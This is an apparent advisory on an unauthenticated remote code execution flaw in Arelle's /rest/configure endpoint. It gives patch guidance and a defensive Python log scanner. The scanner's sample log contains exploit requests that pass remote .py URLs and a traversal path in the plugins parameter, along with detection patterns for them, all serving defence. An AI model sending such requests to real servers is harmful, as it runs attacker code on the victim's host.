Summary
| Parameter | Value |
|---|---|
| CVE ID | CVE-2026-42796 |
| Alert Source | GitHub Advisory - Critical Vulnerability |
| CVE Publication Year | 2026 |
| Date Published | 2026-05-04 |
| Vendor | Arelle |
| Product | Arelle |
| CVSS Score | 9.8 (critical) |
| EPSS Score | No data |
| CISA KEV | No |
| Ransomware | Not confirmed |
Vulnerability Description
Arelle versions before 2.39.10 contain an unauthenticated remote code execution vulnerability in the /rest/configure endpoint of the built-in Arelle webserver. The endpoint accepts a plugins query parameter and hands it to the plugin manager without any authentication or authorization check. An attacker who can reach the endpoint can supply the URL of a malicious Python file in the plugins parameter; the webserver then downloads and executes that attacker-controlled code inside the Arelle process, with whatever privileges that process holds.
Required Actions
Update Arelle to version 2.39.10 or later immediately. Until the patch is deployed, block access to the /rest/configure endpoint at the reverse proxy or web application firewall, and make sure the Arelle webserver is not reachable directly (bind it to localhost or keep it in an isolated network segment), since a proxy rule protects nothing if the process port itself is exposed. The vulnerable endpoint is served by Arelle's webserver mode; installations that only use the command-line or desktop tool and never start the webserver are not reachable this way, but should still be updated. Review webserver and proxy logs for requests to /rest/configure whose plugins value is a URL (http:// or https://) or a filesystem path rather than a plugin name. Because a successful request executes code in the Arelle process, treat any such request found before patching as a potential compromise of that host and investigate it, rather than only blocking the source.
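The log review described above can be scripted. The following example is added for this advisory and is not code from the Arelle project: it parses Combined Log Format access-log lines, keeps only requests to /rest/configure, decodes the plugins query parameter and flags values that look like remote URLs, absolute paths, path traversal or explicit .py files rather than plugin names. The log lines are constructed sample data, not real traffic; the assumption that several plugin names may be separated by "|" (as on Arelle's --plugins command-line option) is an assumption of this example, and the regular expressions are generic detection heuristics, not a signature published by the vendor.

```python
"""Scan access logs for suspicious plugins values on Arelle's /rest/configure.

Example code added for this advisory; not part of Arelle.
Assumptions (not from the advisory): logs are in Combined Log Format, and
multiple plugin names in one request are separated by '|'.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines for demonstration; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [04/May/2026:10:01:12 +0000] "GET /rest/xbrl/validation?file=report.xbrl HTTP/1.1" 200 512 "-" "curl/8.4"
203.0.113.7 - - [04/May/2026:10:02:40 +0000] "GET /rest/configure?plugins=http://203.0.113.9/evil.py HTTP/1.1" 200 87 "-" "python-requests/2.31"
198.51.100.4 - - [04/May/2026:10:03:05 +0000] "GET /rest/configure?plugins=validate%2FEFM HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.4 - - [04/May/2026:10:03:09 +0000] "GET /rest/configure?plugins=https%3A%2F%2Fexample.net%2Fpayload.py HTTP/1.1" 200 87 "-" "Mozilla/5.0"
192.0.2.10 - - [04/May/2026:10:04:00 +0000] "POST /rest/configure?plugins=..%2F..%2Ftmp%2Fx.py HTTP/1.1" 200 87 "-" "curl/8.4"
"""

# Combined Log Format: client, ident, user, [timestamp], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Anything with a URL scheme (http://, https://, ftp://, file://, ...)
URL_RE = re.compile(r'^[A-Za-z][A-Za-z0-9+.\-]*://')
# Windows drive-letter paths such as C:\ or D:/
DRIVE_RE = re.compile(r'^[A-Za-z]:[\\/]')


def classify_plugin_value(value: str):
    """Return a short reason if the plugin value looks malicious, else None.

    Legitimate values are plugin names (e.g. 'validate/EFM'); a URL, an
    absolute path, a traversal sequence or an explicit .py file is not.
    """
    if URL_RE.match(value):
        return "remote URL"
    if value.startswith("/") or DRIVE_RE.match(value):
        return "absolute filesystem path"
    if ".." in value.replace("\\", "/").split("/"):
        return "path traversal"
    if value.lower().endswith(".py"):
        return "explicit Python file"
    return None


def parse_line(line: str):
    """Parse one log line into a dict with decoded path and query, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # The request target is a path plus query; urlsplit separates the two
    # and parse_qs percent-decodes the parameter values.
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def scan_log(text: str):
    """Return a finding for every suspicious plugins value sent to /rest/configure."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"].rstrip("/") != "/rest/configure":
            continue
        for raw in rec["query"].get("plugins", []):
            # Assumption: several plugin names may be joined with '|'.
            for value in raw.split("|"):
                value = value.strip()
                reason = classify_plugin_value(value)
                if reason:
                    findings.append({
                        "ip": rec["ip"], "ts": rec["ts"],
                        "method": rec["method"], "value": value,
                        "reason": reason,
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['method']} plugins={f['value']!r}: {f['reason']}")
```

Run against a real log with `scan_log(open("access.log").read())`; the sample above yields three findings (two remote URLs and one traversal attempt) and correctly ignores the benign validate/EFM request. Any hit with a 200 status on an unpatched server warrants a host-level investigation, not just a block rule.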
Who Is Affected?
This vulnerability affects all Arelle versions prior to 2.39.10, and is exploitable wherever the Arelle webserver is reachable by an attacker. Check whether your organization runs Arelle to process XBRL reports, including instances embedded in reporting or validation pipelines rather than installed as a standalone tool, confirm the installed version, and update without delay.
